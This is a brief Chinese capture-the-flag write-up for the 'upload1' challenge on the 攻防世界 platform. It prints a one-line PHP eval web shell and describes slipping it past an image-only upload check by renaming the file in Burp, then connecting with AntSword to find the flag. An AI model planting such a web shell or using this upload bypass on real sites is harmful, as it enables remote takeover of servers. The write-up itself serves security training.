攻防世界(十二)upload1
攻防世界系列 :upload1
1.打开题目,文件上传。
2.立即上传shell
1.php
<?php @eval($_POST[root]); ?>
提示只能上传图片
3.burp改报文
把1.jpg改为1.php
上传成功
4.蚁剑连接
一顿乱翻找到了flag.php
________________________________________________________
Every good deed you do will someday come back to you.
Love you,love word !